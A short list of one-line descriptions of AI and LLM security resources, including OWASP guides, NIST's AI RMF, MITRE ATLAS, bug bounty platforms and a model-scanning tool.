Practical measures for enterprises to secure AI and LLM technology adoption, reducing security risks with pragmatic advice.
Bugcrowd introduces AI Penetration Testing to uncover vulnerabilities in AI systems, including LLM applications, using vetted pentesters.
NIST's AI Risk Management Framework (AI RMF) is a voluntary framework for managing risks associated with artificial intelligence.
Gandalf is a prompting skills test by Lakera that challenges users to extract secret information from a large language model.
Huntr is the first bug bounty platform focused on AI and ML security, rewarding researchers for finding vulnerabilities in open-source and model-related software.
MITRE ATLAS is a knowledge base of adversary tactics and techniques targeting AI systems, helping organizations secure AI deployments.
ModelScan: scans ML models for unsafe code, supporting H5, Pickle, and SavedModel formats, protecting against serialization attacks.
OWASP unveils the Gen AI Red Teaming Guide, offering a structured approach to evaluating LLM and Generative AI vulnerabilities.
OWASP Gen AI Security Project provides resources, risk strategies, and global collaboration to secure LLMs, AI agents, and generative AI technologies.
OWASP Machine Learning Security Top 10 (2023) identifies the top 10 security risks for machine learning systems, focusing on developers and security experts.
OWASP Top 10 for LLM Applications 2025 highlights key security risks in AI applications, focusing on vulnerabilities and countermeasures.
OWASP Top 10 for Large Language Model Applications educates on security risks in deploying and managing LLMs and Generative AI applications.